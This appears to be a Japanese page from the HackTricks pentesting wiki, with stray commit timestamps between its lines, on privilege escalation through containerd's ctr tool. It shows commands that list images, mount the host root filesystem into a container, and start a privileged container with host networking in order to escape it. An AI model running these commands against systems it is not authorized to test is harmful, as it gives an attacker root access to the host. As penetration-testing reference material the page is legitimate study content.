2024-02-06 14:28:17 +00:00
# Containerd (ctr) 特権昇格
2022-04-28 16:01:33 +00:00
< details >
2024-02-06 14:28:17 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > を通じてゼロからヒーローまでAWSハッキングを学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-06 14:28:17 +00:00
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェックしてください!
* [**公式PEASS& HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) を発見し、独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) のコレクションを見つける
* 💬 [**Discord グループ** ](https://discord.gg/hRep4RUj7f ) または [**telegram グループ** ](https://t.me/peass ) に **参加** または **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live ) **をフォロー** してください。
* **HackTricks** と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) の github リポジトリに PR を提出して **あなたのハッキングテクニックを共有** してください。
2022-04-28 16:01:33 +00:00
< / details >
2023-07-07 23:42:27 +00:00
## 基本情報
2021-01-03 00:43:09 +00:00
2024-02-06 14:28:17 +00:00
**containerd** と `ctr` が何かを学ぶには、以下のリンクに移動してください:
2021-01-03 00:43:09 +00:00
2022-05-01 13:25:53 +00:00
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md ](../../network-services-pentesting/2375-pentesting-docker.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-01-03 00:43:09 +00:00
2022-05-01 13:25:53 +00:00
## PE 1
2021-01-03 00:43:09 +00:00
2024-02-06 14:28:17 +00:00
ホストに `ctr` コマンドが含まれていることがわかった場合:
2021-01-03 00:43:09 +00:00
```bash
which ctr
/usr/bin/ctr
```
2024-02-06 14:28:17 +00:00
以下は、画像をリストアップできます:
2021-01-03 00:43:09 +00:00
2024-02-06 14:28:17 +00:00
```shell
2023-07-07 23:42:27 +00:00
ctr images ls
```
2021-01-03 00:43:09 +00:00
```bash
ctr image list
2023-07-07 23:42:27 +00:00
REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
2021-01-03 00:43:09 +00:00
```
2024-02-06 14:28:17 +00:00
そして、**ホストのルートフォルダをマウントしているこれらのイメージの1つを実行します**:
2021-01-03 00:43:09 +00:00
```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
2022-05-01 13:25:53 +00:00
## PE 2
2021-01-03 00:43:09 +00:00
2024-02-06 14:28:17 +00:00
特権付きコンテナを実行し、そこから脱出します。\
次のように特権付きコンテナを実行できます:
2021-01-03 00:43:09 +00:00
```bash
2023-07-07 23:42:27 +00:00
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
2021-01-03 00:43:09 +00:00
```
2024-02-06 14:28:17 +00:00
次のページで言及されているいくつかの技術を使用して、特権付与機能を悪用してそれから脱出することができます:
2021-01-03 00:43:09 +00:00
2023-04-05 15:16:57 +00:00
{% content-ref url="docker-security/" %}
[docker-security ](docker-security/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}